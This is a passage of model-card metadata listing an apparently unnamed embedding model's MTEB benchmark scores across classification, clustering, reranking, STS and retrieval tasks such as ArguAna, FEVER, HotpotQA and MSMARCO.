revision: e8379541af4e31359cca9fbcf4b00f2671dba205
metrics:
- type: accuracy
value: 77.19402985074628
- type: ap
value: 40.43267503017359
- type: f1
value: 71.15585210518594
- task:
type: Classification
dataset:
name: MTEB AmazonPolarityClassification
type: mteb/amazon_polarity
config: default
split: test
revision: e2d317d38cd51312af73b3d32a06d1a08b442046
metrics:
- type: accuracy
value: 93.256675
- type: ap
value: 90.00824833079179
- type: f1
value: 93.2473146151734
- task:
type: Classification
dataset:
name: MTEB AmazonReviewsClassification (en)
type: mteb/amazon_reviews_multi
config: en
split: test
revision: 1399c76144fd37290681b995c656ef9b2e06e26d
metrics:
- type: accuracy
value: 49.612
- type: f1
value: 48.530785631574304
- task:
type: Retrieval
dataset:
name: MTEB ArguAna
type: arguana
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 37.411
- type: map_at_10
value: 52.673
- type: map_at_100
value: 53.410999999999994
- type: map_at_1000
value: 53.415
- type: map_at_3
value: 48.495
- type: map_at_5
value: 51.183
- type: mrr_at_1
value: 37.838
- type: mrr_at_10
value: 52.844
- type: mrr_at_100
value: 53.581999999999994
- type: mrr_at_1000
value: 53.586
- type: mrr_at_3
value: 48.672
- type: mrr_at_5
value: 51.272
- type: ndcg_at_1
value: 37.411
- type: ndcg_at_10
value: 60.626999999999995
- type: ndcg_at_100
value: 63.675000000000004
- type: ndcg_at_1000
value: 63.776999999999994
- type: ndcg_at_3
value: 52.148
- type: ndcg_at_5
value: 57.001999999999995
- type: precision_at_1
value: 37.411
- type: precision_at_10
value: 8.578
- type: precision_at_100
value: 0.989
- type: precision_at_1000
value: 0.1
- type: precision_at_3
value: 20.91
- type: precision_at_5
value: 14.908
- type: recall_at_1
value: 37.411
- type: recall_at_10
value: 85.775
- type: recall_at_100
value: 98.86200000000001
- type: recall_at_1000
value: 99.644
- type: recall_at_3
value: 62.731
- type: recall_at_5
value: 74.53800000000001
- task:
type: Clustering
dataset:
name: MTEB ArxivClusteringP2P
type: mteb/arxiv-clustering-p2p
config: default
split: test
revision: a122ad7f3f0291bf49cc6f4d32aa80929df69d5d
metrics:
- type: v_measure
value: 47.24219029437865
- task:
type: Clustering
dataset:
name: MTEB ArxivClusteringS2S
type: mteb/arxiv-clustering-s2s
config: default
split: test
revision: f910caf1a6075f7329cdf8c1a6135696f37dbd53
metrics:
- type: v_measure
value: 40.474604844291726
- task:
type: Reranking
dataset:
name: MTEB AskUbuntuDupQuestions
type: mteb/askubuntudupquestions-reranking
config: default
split: test
revision: 2000358ca161889fa9c082cb41daa8dcfb161a54
metrics:
- type: map
value: 62.720542706366054
- type: mrr
value: 75.59633733456448
- task:
type: STS
dataset:
name: MTEB BIOSSES
type: mteb/biosses-sts
config: default
split: test
revision: d3fb88f8f02e40887cd149695127462bbcf29b4a
metrics:
- type: cos_sim_pearson
value: 86.31345008397868
- type: cos_sim_spearman
value: 85.94292212320399
- type: euclidean_pearson
value: 85.03974302774525
- type: euclidean_spearman
value: 85.88087251659051
- type: manhattan_pearson
value: 84.91900996712951
- type: manhattan_spearman
value: 85.96701905781116
- task:
type: Classification
dataset:
name: MTEB Banking77Classification
type: mteb/banking77
config: default
split: test
revision: 0fd18e25b25c072e09e0d92ab615fda904d66300
metrics:
- type: accuracy
value: 84.72727272727273
- type: f1
value: 84.29572512364581
- task:
type: Clustering
dataset:
name: MTEB BiorxivClusteringP2P
type: mteb/biorxiv-clustering-p2p
config: default
split: test
revision: 65b79d1d13f80053f67aca9498d9402c2d9f1f40
metrics:
- type: v_measure
value: 39.55532460397536
- task:
type: Clustering
dataset:
name: MTEB BiorxivClusteringS2S
type: mteb/biorxiv-clustering-s2s
config: default
split: test
revision: 258694dd0231531bc1fd9de6ceb52a0853c6d908
metrics:
- type: v_measure
value: 35.91195973591251
- task:
type: Retrieval
dataset:
name: MTEB CQADupstackAndroidRetrieval
type: BeIR/cqadupstack
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 32.822
- type: map_at_10
value: 44.139
- type: map_at_100
value: 45.786
- type: map_at_1000
value: 45.906000000000006
- type: map_at_3
value: 40.637
- type: map_at_5
value: 42.575
- type: mrr_at_1
value: 41.059
- type: mrr_at_10
value: 50.751000000000005
- type: mrr_at_100
value: 51.548
- type: mrr_at_1000
value: 51.583999999999996
- type: mrr_at_3
value: 48.236000000000004
- type: mrr_at_5
value: 49.838
- type: ndcg_at_1
value: 41.059
- type: ndcg_at_10
value: 50.573
- type: ndcg_at_100
value: 56.25
- type: ndcg_at_1000
value: 58.004
- type: ndcg_at_3
value: 45.995000000000005
- type: ndcg_at_5
value: 48.18
- type: precision_at_1
value: 41.059
- type: precision_at_10
value: 9.757
- type: precision_at_100
value: 1.609
- type: precision_at_1000
value: 0.20600000000000002
- type: precision_at_3
value: 22.222
- type: precision_at_5
value: 16.023
- type: recall_at_1
value: 32.822
- type: recall_at_10
value: 61.794000000000004
- type: recall_at_100
value: 85.64699999999999
- type: recall_at_1000
value: 96.836
- type: recall_at_3
value: 47.999
- type: recall_at_5
value: 54.376999999999995
- type: map_at_1
value: 29.579
- type: map_at_10
value: 39.787
- type: map_at_100
value: 40.976
- type: map_at_1000
value: 41.108
- type: map_at_3
value: 36.819
- type: map_at_5
value: 38.437
- type: mrr_at_1
value: 37.516
- type: mrr_at_10
value: 45.822
- type: mrr_at_100
value: 46.454
- type: mrr_at_1000
value: 46.495999999999995
- type: mrr_at_3
value: 43.556
- type: mrr_at_5
value: 44.814
- type: ndcg_at_1
value: 37.516
- type: ndcg_at_10
value: 45.5
- type: ndcg_at_100
value: 49.707
- type: ndcg_at_1000
value: 51.842
- type: ndcg_at_3
value: 41.369
- type: ndcg_at_5
value: 43.161
- type: precision_at_1
value: 37.516
- type: precision_at_10
value: 8.713
- type: precision_at_100
value: 1.38
- type: precision_at_1000
value: 0.188
- type: precision_at_3
value: 20.233999999999998
- type: precision_at_5
value: 14.280000000000001
- type: recall_at_1
value: 29.579
- type: recall_at_10
value: 55.458
- type: recall_at_100
value: 73.49799999999999
- type: recall_at_1000
value: 87.08200000000001
- type: recall_at_3
value: 42.858000000000004
- type: recall_at_5
value: 48.215
- type: map_at_1
value: 40.489999999999995
- type: map_at_10
value: 53.313
- type: map_at_100
value: 54.290000000000006
- type: map_at_1000
value: 54.346000000000004
- type: map_at_3
value: 49.983
- type: map_at_5
value: 51.867
- type: mrr_at_1
value: 46.27
- type: mrr_at_10
value: 56.660999999999994
- type: mrr_at_100
value: 57.274
- type: mrr_at_1000
value: 57.301
- type: mrr_at_3
value: 54.138
- type: mrr_at_5
value: 55.623999999999995
- type: ndcg_at_1
value: 46.27
- type: ndcg_at_10
value: 59.192
- type: ndcg_at_100
value: 63.026
- type: ndcg_at_1000
value: 64.079
- type: ndcg_at_3
value: 53.656000000000006
- type: ndcg_at_5
value: 56.387
- type: precision_at_1
value: 46.27
- type: precision_at_10
value: 9.511
- type: precision_at_100
value: 1.23
- type: precision_at_1000
value: 0.136
- type: precision_at_3
value: 24.096
- type: precision_at_5
value: 16.476
- type: recall_at_1
value: 40.489999999999995
- type: recall_at_10
value: 73.148
- type: recall_at_100
value: 89.723
- type: recall_at_1000
value: 97.073
- type: recall_at_3
value: 58.363
- type: recall_at_5
value: 65.083
- type: map_at_1
value: 26.197
- type: map_at_10
value: 35.135
- type: map_at_100
value: 36.14
- type: map_at_1000
value: 36.216
- type: map_at_3
value: 32.358
- type: map_at_5
value: 33.814
- type: mrr_at_1
value: 28.475
- type: mrr_at_10
value: 37.096000000000004
- type: mrr_at_100
value: 38.006
- type: mrr_at_1000
value: 38.06
- type: mrr_at_3
value: 34.52
- type: mrr_at_5
value: 35.994
- type: ndcg_at_1
value: 28.475
- type: ndcg_at_10
value: 40.263
- type: ndcg_at_100
value: 45.327
- type: ndcg_at_1000
value: 47.225
- type: ndcg_at_3
value: 34.882000000000005
- type: ndcg_at_5
value: 37.347
- type: precision_at_1
value: 28.475
- type: precision_at_10
value: 6.249
- type: precision_at_100
value: 0.919
- type: precision_at_1000
value: 0.11199999999999999
- type: precision_at_3
value: 14.689
- type: precision_at_5
value: 10.237
- type: recall_at_1
value: 26.197
- type: recall_at_10
value: 54.17999999999999
- type: recall_at_100
value: 77.768
- type: recall_at_1000
value: 91.932
- type: recall_at_3
value: 39.804
- type: recall_at_5
value: 45.660000000000004
- type: map_at_1
value: 16.683
- type: map_at_10
value: 25.013999999999996
- type: map_at_100
value: 26.411
- type: map_at_1000
value: 26.531
- type: map_at_3
value: 22.357
- type: map_at_5
value: 23.982999999999997
- type: mrr_at_1
value: 20.896
- type: mrr_at_10
value: 29.758000000000003
- type: mrr_at_100
value: 30.895
- type: mrr_at_1000
value: 30.964999999999996
- type: mrr_at_3
value: 27.177
- type: mrr_at_5
value: 28.799999999999997
- type: ndcg_at_1
value: 20.896
- type: ndcg_at_10
value: 30.294999999999998
- type: ndcg_at_100
value: 36.68
- type: ndcg_at_1000
value: 39.519
- type: ndcg_at_3
value: 25.480999999999998
- type: ndcg_at_5
value: 28.027
- type: precision_at_1
value: 20.896
- type: precision_at_10
value: 5.56
- type: precision_at_100
value: 1.006
- type: precision_at_1000
value: 0.13899999999999998
- type: precision_at_3
value: 12.231
- type: precision_at_5
value: 9.104
- type: recall_at_1
value: 16.683
- type: recall_at_10
value: 41.807
- type: recall_at_100
value: 69.219
- type: recall_at_1000
value: 89.178
- type: recall_at_3
value: 28.772
- type: recall_at_5
value: 35.167
- type: map_at_1
value: 30.653000000000002
- type: map_at_10
value: 41.21
- type: map_at_100
value: 42.543
- type: map_at_1000
value: 42.657000000000004
- type: map_at_3
value: 38.094
- type: map_at_5
value: 39.966
- type: mrr_at_1
value: 37.824999999999996
- type: mrr_at_10
value: 47.087
- type: mrr_at_100
value: 47.959
- type: mrr_at_1000
value: 48.003
- type: mrr_at_3
value: 45.043
- type: mrr_at_5
value: 46.352
- type: ndcg_at_1
value: 37.824999999999996
- type: ndcg_at_10
value: 47.158
- type: ndcg_at_100
value: 52.65
- type: ndcg_at_1000
value: 54.644999999999996
- type: ndcg_at_3
value: 42.632999999999996
- type: ndcg_at_5
value: 44.994
- type: precision_at_1
value: 37.824999999999996
- type: precision_at_10
value: 8.498999999999999
- type: precision_at_100
value: 1.308
- type: precision_at_1000
value: 0.166
- type: precision_at_3
value: 20.308
- type: precision_at_5
value: 14.283000000000001
- type: recall_at_1
value: 30.653000000000002
- type: recall_at_10
value: 58.826
- type: recall_at_100
value: 81.94
- type: recall_at_1000
value: 94.71000000000001
- type: recall_at_3
value: 45.965
- type: recall_at_5
value: 52.294
- type: map_at_1
value: 26.71
- type: map_at_10
value: 36.001
- type: map_at_100
value: 37.416
- type: map_at_1000
value: 37.522
- type: map_at_3
value: 32.841
- type: map_at_5
value: 34.515
- type: mrr_at_1
value: 32.647999999999996
- type: mrr_at_10
value: 41.43
- type: mrr_at_100
value: 42.433
- type: mrr_at_1000
value: 42.482
- type: mrr_at_3
value: 39.117000000000004
- type: mrr_at_5
value: 40.35
- type: ndcg_at_1
value: 32.647999999999996
- type: ndcg_at_10
value: 41.629
- type: ndcg_at_100
value: 47.707
- type: ndcg_at_1000
value: 49.913000000000004
- type: ndcg_at_3
value: 36.598000000000006
- type: ndcg_at_5
value: 38.696000000000005
- type: precision_at_1
value: 32.647999999999996
- type: precision_at_10
value: 7.704999999999999
- type: precision_at_100
value: 1.242
- type: precision_at_1000
value: 0.16
- type: precision_at_3
value: 17.314
- type: precision_at_5
value: 12.374
- type: recall_at_1
value: 26.71
- type: recall_at_10
value: 52.898
- type: recall_at_100
value: 79.08
- type: recall_at_1000
value: 93.94
- type: recall_at_3
value: 38.731
- type: recall_at_5
value: 44.433
- type: map_at_1
value: 26.510999999999996
- type: map_at_10
value: 35.755333333333326
- type: map_at_100
value: 36.97525
- type: map_at_1000
value: 37.08741666666667
- type: map_at_3
value: 32.921
- type: map_at_5
value: 34.45041666666667
- type: mrr_at_1
value: 31.578416666666666
- type: mrr_at_10
value: 40.06066666666667
- type: mrr_at_100
value: 40.93350000000001
- type: mrr_at_1000
value: 40.98716666666667
- type: mrr_at_3
value: 37.710499999999996
- type: mrr_at_5
value: 39.033249999999995
- type: ndcg_at_1
value: 31.578416666666666
- type: ndcg_at_10
value: 41.138666666666666
- type: ndcg_at_100
value: 46.37291666666666
- type: ndcg_at_1000
value: 48.587500000000006
- type: ndcg_at_3
value: 36.397083333333335
- type: ndcg_at_5
value: 38.539
- type: precision_at_1
value: 31.578416666666666
- type: precision_at_10
value: 7.221583333333332
- type: precision_at_100
value: 1.1581666666666668
- type: precision_at_1000
value: 0.15416666666666667
- type: precision_at_3
value: 16.758
- type: precision_at_5
value: 11.830916666666665
- type: recall_at_1
value: 26.510999999999996
- type: recall_at_10
value: 52.7825
- type: recall_at_100
value: 75.79675
- type: recall_at_1000
value: 91.10483333333335
- type: recall_at_3
value: 39.48233333333334
- type: recall_at_5
value: 45.07116666666667
- type: map_at_1
value: 24.564
- type: map_at_10
value: 31.235000000000003
- type: map_at_100
value: 32.124
- type: map_at_1000
value: 32.216
- type: map_at_3
value: 29.330000000000002
- type: map_at_5
value: 30.379
- type: mrr_at_1
value: 27.761000000000003
- type: mrr_at_10
value: 34.093
- type: mrr_at_100
value: 34.885
- type: mrr_at_1000
value: 34.957
- type: mrr_at_3
value: 32.388
- type: mrr_at_5
value: 33.269
- type: ndcg_at_1
value: 27.761000000000003
- type: ndcg_at_10
value: 35.146
- type: ndcg_at_100
value: 39.597
- type: ndcg_at_1000
value: 42.163000000000004
- type: ndcg_at_3
value: 31.674000000000003
- type: ndcg_at_5
value: 33.224
- type: precision_at_1
value: 27.761000000000003
- type: precision_at_10
value: 5.383
- type: precision_at_100
value: 0.836
- type: precision_at_1000
value: 0.11199999999999999
- type: precision_at_3
value: 13.599
- type: precision_at_5
value: 9.202
- type: recall_at_1
value: 24.564
- type: recall_at_10
value: 44.36
- type: recall_at_100
value: 64.408
- type: recall_at_1000
value: 83.892
- type: recall_at_3
value: 34.653
- type: recall_at_5
value: 38.589
- type: map_at_1
value: 17.01
- type: map_at_10
value: 24.485
- type: map_at_100
value: 25.573
- type: map_at_1000
value: 25.703
- type: map_at_3
value: 21.953
- type: map_at_5
value: 23.294999999999998
- type: mrr_at_1
value: 20.544
- type: mrr_at_10
value: 28.238000000000003
- type: mrr_at_100
value: 29.142000000000003
- type: mrr_at_1000
value: 29.219
- type: mrr_at_3
value: 25.802999999999997
- type: mrr_at_5
value: 27.105
- type: ndcg_at_1
value: 20.544
- type: ndcg_at_10
value: 29.387999999999998
- type: ndcg_at_100
value: 34.603
- type: ndcg_at_1000
value: 37.564
- type: ndcg_at_3
value: 24.731
- type: ndcg_at_5
value: 26.773000000000003
- type: precision_at_1
value: 20.544
- type: precision_at_10
value: 5.509
- type: precision_at_100
value: 0.9450000000000001
- type: precision_at_1000
value: 0.13799999999999998
- type: precision_at_3
value: 11.757
- type: precision_at_5
value: 8.596
- type: recall_at_1
value: 17.01
- type: recall_at_10
value: 40.392
- type: recall_at_100
value: 64.043
- type: recall_at_1000
value: 85.031
- type: recall_at_3
value: 27.293
- type: recall_at_5
value: 32.586999999999996
- type: map_at_1
value: 27.155
- type: map_at_10
value: 35.92
- type: map_at_100
value: 37.034
- type: map_at_1000
value: 37.139
- type: map_at_3
value: 33.263999999999996
- type: map_at_5
value: 34.61
- type: mrr_at_1
value: 32.183
- type: mrr_at_10
value: 40.099000000000004
- type: mrr_at_100
value: 41.001
- type: mrr_at_1000
value: 41.059
- type: mrr_at_3
value: 37.889
- type: mrr_at_5
value: 39.007999999999996
- type: ndcg_at_1
value: 32.183
- type: ndcg_at_10
value: 41.127
- type: ndcg_at_100
value: 46.464
- type: ndcg_at_1000
value: 48.67
- type: ndcg_at_3
value: 36.396
- type: ndcg_at_5
value: 38.313
- type: precision_at_1
value: 32.183
- type: precision_at_10
value: 6.847
- type: precision_at_100
value: 1.0739999999999998
- type: precision_at_1000
value: 0.13699999999999998
- type: precision_at_3
value: 16.356
- type: precision_at_5
value: 11.362
- type: recall_at_1
value: 27.155
- type: recall_at_10
value: 52.922000000000004
- type: recall_at_100
value: 76.39
- type: recall_at_1000
value: 91.553
- type: recall_at_3
value: 39.745999999999995
- type: recall_at_5
value: 44.637
- type: map_at_1
value: 25.523
- type: map_at_10
value: 34.268
- type: map_at_100
value: 35.835
- type: map_at_1000
value: 36.046
- type: map_at_3
value: 31.662000000000003
- type: map_at_5
value: 32.71
- type: mrr_at_1
value: 31.028
- type: mrr_at_10
value: 38.924
- type: mrr_at_100
value: 39.95
- type: mrr_at_1000
value: 40.003
- type: mrr_at_3
value: 36.594
- type: mrr_at_5
value: 37.701
- type: ndcg_at_1
value: 31.028
- type: ndcg_at_10
value: 39.848
- type: ndcg_at_100
value: 45.721000000000004
- type: ndcg_at_1000
value: 48.424
- type: ndcg_at_3
value: 35.329
- type: ndcg_at_5
value: 36.779
- type: precision_at_1
value: 31.028
- type: precision_at_10
value: 7.51
- type: precision_at_100
value: 1.478
- type: precision_at_1000
value: 0.24
- type: precision_at_3
value: 16.337
- type: precision_at_5
value: 11.383000000000001
- type: recall_at_1
value: 25.523
- type: recall_at_10
value: 50.735
- type: recall_at_100
value: 76.593
- type: recall_at_1000
value: 93.771
- type: recall_at_3
value: 37.574000000000005
- type: recall_at_5
value: 41.602
- type: map_at_1
value: 20.746000000000002
- type: map_at_10
value: 28.557
- type: map_at_100
value: 29.575000000000003
- type: map_at_1000
value: 29.659000000000002
- type: map_at_3
value: 25.753999999999998
- type: map_at_5
value: 27.254
- type: mrr_at_1
value: 22.736
- type: mrr_at_10
value: 30.769000000000002
- type: mrr_at_100
value: 31.655
- type: mrr_at_1000
value: 31.717000000000002
- type: mrr_at_3
value: 28.065
- type: mrr_at_5
value: 29.543999999999997
- type: ndcg_at_1
value: 22.736
- type: ndcg_at_10
value: 33.545
- type: ndcg_at_100
value: 38.743
- type: ndcg_at_1000
value: 41.002
- type: ndcg_at_3
value: 28.021
- type: ndcg_at_5
value: 30.586999999999996
- type: precision_at_1
value: 22.736
- type: precision_at_10
value: 5.416
- type: precision_at_100
value: 0.8710000000000001
- type: precision_at_1000
value: 0.116
- type: precision_at_3
value: 11.953
- type: precision_at_5
value: 8.651
- type: recall_at_1
value: 20.746000000000002
- type: recall_at_10
value: 46.87
- type: recall_at_100
value: 71.25200000000001
- type: recall_at_1000
value: 88.26
- type: recall_at_3
value: 32.029999999999994
- type: recall_at_5
value: 38.21
- task:
type: Retrieval
dataset:
name: MTEB ClimateFEVER
type: climate-fever
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 12.105
- type: map_at_10
value: 20.577
- type: map_at_100
value: 22.686999999999998
- type: map_at_1000
value: 22.889
- type: map_at_3
value: 17.174
- type: map_at_5
value: 18.807
- type: mrr_at_1
value: 27.101
- type: mrr_at_10
value: 38.475
- type: mrr_at_100
value: 39.491
- type: mrr_at_1000
value: 39.525
- type: mrr_at_3
value: 34.886
- type: mrr_at_5
value: 36.922
- type: ndcg_at_1
value: 27.101
- type: ndcg_at_10
value: 29.002
- type: ndcg_at_100
value: 37.218
- type: ndcg_at_1000
value: 40.644000000000005
- type: ndcg_at_3
value: 23.464
- type: ndcg_at_5
value: 25.262
- type: precision_at_1
value: 27.101
- type: precision_at_10
value: 9.179
- type: precision_at_100
value: 1.806
- type: precision_at_1000
value: 0.244
- type: precision_at_3
value: 17.394000000000002
- type: precision_at_5
value: 13.342
- type: recall_at_1
value: 12.105
- type: recall_at_10
value: 35.143
- type: recall_at_100
value: 63.44499999999999
- type: recall_at_1000
value: 82.49499999999999
- type: recall_at_3
value: 21.489
- type: recall_at_5
value: 26.82
- task:
type: Retrieval
dataset:
name: MTEB DBPedia
type: dbpedia-entity
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 8.769
- type: map_at_10
value: 18.619
- type: map_at_100
value: 26.3
- type: map_at_1000
value: 28.063
- type: map_at_3
value: 13.746
- type: map_at_5
value: 16.035
- type: mrr_at_1
value: 65.25
- type: mrr_at_10
value: 73.678
- type: mrr_at_100
value: 73.993
- type: mrr_at_1000
value: 74.003
- type: mrr_at_3
value: 72.042
- type: mrr_at_5
value: 72.992
- type: ndcg_at_1
value: 53.625
- type: ndcg_at_10
value: 39.638
- type: ndcg_at_100
value: 44.601
- type: ndcg_at_1000
value: 52.80200000000001
- type: ndcg_at_3
value: 44.727
- type: ndcg_at_5
value: 42.199
- type: precision_at_1
value: 65.25
- type: precision_at_10
value: 31.025000000000002
- type: precision_at_100
value: 10.174999999999999
- type: precision_at_1000
value: 2.0740000000000003
- type: precision_at_3
value: 48.083
- type: precision_at_5
value: 40.6
- type: recall_at_1
value: 8.769
- type: recall_at_10
value: 23.910999999999998
- type: recall_at_100
value: 51.202999999999996
- type: recall_at_1000
value: 77.031
- type: recall_at_3
value: 15.387999999999998
- type: recall_at_5
value: 18.919
- task:
type: Classification
dataset:
name: MTEB EmotionClassification
type: mteb/emotion
config: default
split: test
revision: 4f58c6b202a23cf9a4da393831edf4f9183cad37
metrics:
- type: accuracy
value: 54.47
- type: f1
value: 48.21839043361556
- task:
type: Retrieval
dataset:
name: MTEB FEVER
type: fever
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 63.564
- type: map_at_10
value: 74.236
- type: map_at_100
value: 74.53699999999999
- type: map_at_1000
value: 74.557
- type: map_at_3
value: 72.556
- type: map_at_5
value: 73.656
- type: mrr_at_1
value: 68.497
- type: mrr_at_10
value: 78.373
- type: mrr_at_100
value: 78.54299999999999
- type: mrr_at_1000
value: 78.549
- type: mrr_at_3
value: 77.03
- type: mrr_at_5
value: 77.938
- type: ndcg_at_1
value: 68.497
- type: ndcg_at_10
value: 79.12599999999999
- type: ndcg_at_100
value: 80.319
- type: ndcg_at_1000
value: 80.71199999999999
- type: ndcg_at_3
value: 76.209
- type: ndcg_at_5
value: 77.90700000000001
- type: precision_at_1
value: 68.497
- type: precision_at_10
value: 9.958
- type: precision_at_100
value: 1.077
- type: precision_at_1000
value: 0.11299999999999999
- type: precision_at_3
value: 29.908
- type: precision_at_5
value: 18.971
- type: recall_at_1
value: 63.564
- type: recall_at_10
value: 90.05199999999999
- type: recall_at_100
value: 95.028
- type: recall_at_1000
value: 97.667
- type: recall_at_3
value: 82.17999999999999
- type: recall_at_5
value: 86.388
- task:
type: Retrieval
dataset:
name: MTEB FiQA2018
type: fiqa
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 19.042
- type: map_at_10
value: 30.764999999999997
- type: map_at_100
value: 32.678000000000004
- type: map_at_1000
value: 32.881
- type: map_at_3
value: 26.525
- type: map_at_5
value: 28.932000000000002
- type: mrr_at_1
value: 37.653999999999996
- type: mrr_at_10
value: 46.597
- type: mrr_at_100
value: 47.413
- type: mrr_at_1000
value: 47.453
- type: mrr_at_3
value: 43.775999999999996
- type: mrr_at_5
value: 45.489000000000004
- type: ndcg_at_1
value: 37.653999999999996
- type: ndcg_at_10
value: 38.615
- type: ndcg_at_100
value: 45.513999999999996
- type: ndcg_at_1000
value: 48.815999999999995
- type: ndcg_at_3
value: 34.427
- type: ndcg_at_5
value: 35.954
- type: precision_at_1
value: 37.653999999999996
- type: precision_at_10
value: 10.864
- type: precision_at_100
value: 1.7850000000000001
- type: precision_at_1000
value: 0.23800000000000002
- type: precision_at_3
value: 22.788
- type: precision_at_5
value: 17.346
- type: recall_at_1
value: 19.042
- type: recall_at_10
value: 45.707
- type: recall_at_100
value: 71.152
- type: recall_at_1000
value: 90.7
- type: recall_at_3
value: 30.814000000000004
- type: recall_at_5
value: 37.478
- task:
type: Retrieval
dataset:
name: MTEB HotpotQA
type: hotpotqa
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 38.001000000000005
- type: map_at_10
value: 59.611000000000004
- type: map_at_100
value: 60.582
- type: map_at_1000
value: 60.646
- type: map_at_3
value: 56.031
- type: map_at_5
value: 58.243
- type: mrr_at_1
value: 76.003
- type: mrr_at_10
value: 82.15400000000001
- type: mrr_at_100
value: 82.377
- type: mrr_at_1000
value: 82.383
- type: mrr_at_3
value: 81.092
- type: mrr_at_5
value: 81.742
- type: ndcg_at_1
value: 76.003
- type: ndcg_at_10
value: 68.216
- type: ndcg_at_100
value: 71.601
- type: ndcg_at_1000
value: 72.821
- type: ndcg_at_3
value: 63.109
- type: ndcg_at_5
value: 65.902
- type: precision_at_1
value: 76.003
- type: precision_at_10
value: 14.379
- type: precision_at_100
value: 1.702
- type: precision_at_1000
value: 0.186
- type: precision_at_3
value: 40.396
- type: precision_at_5
value: 26.442
- type: recall_at_1
value: 38.001000000000005
- type: recall_at_10
value: 71.897
- type: recall_at_100
value: 85.105
- type: recall_at_1000
value: 93.133
- type: recall_at_3
value: 60.594
- type: recall_at_5
value: 66.104
- task:
type: Classification
dataset:
name: MTEB ImdbClassification
type: mteb/imdb
config: default
split: test
revision: 3d86128a09e091d6018b6d26cad27f2739fc2db7
metrics:
- type: accuracy
value: 91.31280000000001
- type: ap
value: 87.53723467501632
- type: f1
value: 91.30282906596291
- task:
type: Retrieval
dataset:
name: MTEB MSMARCO
type: msmarco
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 21.917
- type: map_at_10
value: 34.117999999999995
- type: map_at_100
value: 35.283
- type: map_at_1000
value: 35.333999999999996
- type: map_at_3
value: 30.330000000000002
- type: map_at_5
value: 32.461
- type: mrr_at_1
value: 22.579
- type: mrr_at_10
value: 34.794000000000004
- type: mrr_at_100
value: 35.893
- type: mrr_at_1000
value: 35.937000000000005
- type: mrr_at_3
value: 31.091
- type: mrr_at_5
value: 33.173
- type: ndcg_at_1
value: 22.579
- type: ndcg_at_10
value: 40.951
- type: ndcg_at_100
value: 46.558
- type: ndcg_at_1000
value: 47.803000000000004
- type: ndcg_at_3
value: 33.262
- type: ndcg_at_5
value: 37.036
- type: precision_at_1
value: 22.579
- type: precision_at_10
value: 6.463000000000001
- type: precision_at_100
value: 0.928
- type: precision_at_1000
value: 0.104
- type: precision_at_3
value: 14.174000000000001
- type: precision_at_5
value: 10.421
- type: recall_at_1
value: 21.917
- type: recall_at_10
value: 61.885
- type: recall_at_100
value: 87.847
- type: recall_at_1000
value: 97.322
- type: recall_at_3
value: 41.010000000000005
- type: recall_at_5
value: 50.031000000000006
- task:
type: Classification
dataset:
name: MTEB MTOPDomainClassification (en)
type: mteb/mtop_domain
config: en
split: test
revision: d80d48c1eb48d3562165c59d59d0034df9fff0bf
metrics:
- type: accuracy
value: 93.49521203830369
- type: f1
value: 93.30882341740241
- task:
type: Classification
dataset:
name: MTEB MTOPIntentClassification (en)
type: mteb/mtop_intent
config: en
split: test
revision: ae001d0e6b1228650b7bd1c2c65fb50ad11a8aba
metrics:
- type: accuracy
value: 71.0579115367077
- type: f1
value: 51.2368258319339
- task:
type: Classification
dataset:
name: MTEB MassiveIntentClassification (en)
type: mteb/amazon_massive_intent
config: en
split: test
revision: 31efe3c427b0bae9c22cbb560b8f15491cc6bed7
metrics:
- type: accuracy
value: 73.88029589778077
- type: f1
value: 72.34422048584663
- task:
type: Classification
dataset:
name: MTEB MassiveScenarioClassification (en)
type: mteb/amazon_massive_scenario
config: en
split: test
revision: 7d571f92784cd94a019292a1f45445077d0ef634
metrics:
- type: accuracy
value: 78.2817753866846
- type: f1
value: 77.87746050004304
- task:
type: Clustering
dataset:
name: MTEB MedrxivClusteringP2P
type: mteb/medrxiv-clustering-p2p
config: default
split: test
revision: e7a26af6f3ae46b30dde8737f02c07b1505bcc73
metrics:
- type: v_measure
value: 33.247341454119216
- task:
type: Clustering
dataset:
name: MTEB MedrxivClusteringS2S
type: mteb/medrxiv-clustering-s2s
config: default
split: test
revision: 35191c8c0dca72d8ff3efcd72aa802307d469663
metrics:
- type: v_measure
value: 31.9647477166234
- task:
type: Reranking
dataset:
name: MTEB MindSmallReranking
type: mteb/mind_small
config: default
split: test
revision: 3bdac13927fdc888b903db93b2ffdbd90b295a69
metrics:
- type: map
value: 31.90698374676892
- type: mrr
value: 33.07523683771251
- task:
type: Retrieval
dataset:
name: MTEB NFCorpus
type: nfcorpus
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 6.717
- type: map_at_10
value: 14.566
- type: map_at_100
value: 18.465999999999998
- type: map_at_1000
value: 20.033
- type: map_at_3
value: 10.863
- type: map_at_5
value: 12.589
- type: mrr_at_1
value: 49.845
- type: mrr_at_10
value: 58.385
- type: mrr_at_100
value: 58.989999999999995
- type: mrr_at_1000
value: 59.028999999999996
- type: mrr_at_3
value: 56.76
- type: mrr_at_5
value: 57.766
- type: ndcg_at_1
value: 47.678
- type: ndcg_at_10
value: 37.511
- type: ndcg_at_100
value: 34.537
- type: ndcg_at_1000
value: 43.612
- type: ndcg_at_3
value: 43.713
- type: ndcg_at_5
value: 41.303
- type: precision_at_1
value: 49.845
- type: precision_at_10
value: 27.307
- type: precision_at_100
value: 8.746
- type: precision_at_1000
value: 2.182
- type: precision_at_3
value: 40.764
- type: precision_at_5
value: 35.232
- type: recall_at_1
value: 6.717
- type: recall_at_10
value: 18.107
- type: recall_at_100
value: 33.759
- type: recall_at_1000
value: 67.31
- type: recall_at_3
value: 11.68
- type: recall_at_5
value: 14.557999999999998
- task:
type: Retrieval
dataset:
name: MTEB NQ
type: nq
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.633999999999997
- type: map_at_10
value: 42.400999999999996
- type: map_at_100
value: 43.561
- type: map_at_1000
value: 43.592
- type: map_at_3
value: 37.865
- type: map_at_5
value: 40.650999999999996
- type: mrr_at_1
value: 31.286
- type: mrr_at_10
value: 44.996
- type: mrr_at_100
value: 45.889
- type: mrr_at_1000
value: 45.911
- type: mrr_at_3
value: 41.126000000000005
